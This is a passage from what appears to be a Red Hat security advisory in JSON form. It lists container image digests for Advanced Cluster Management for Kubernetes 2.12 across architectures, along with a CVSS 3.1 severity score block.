"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
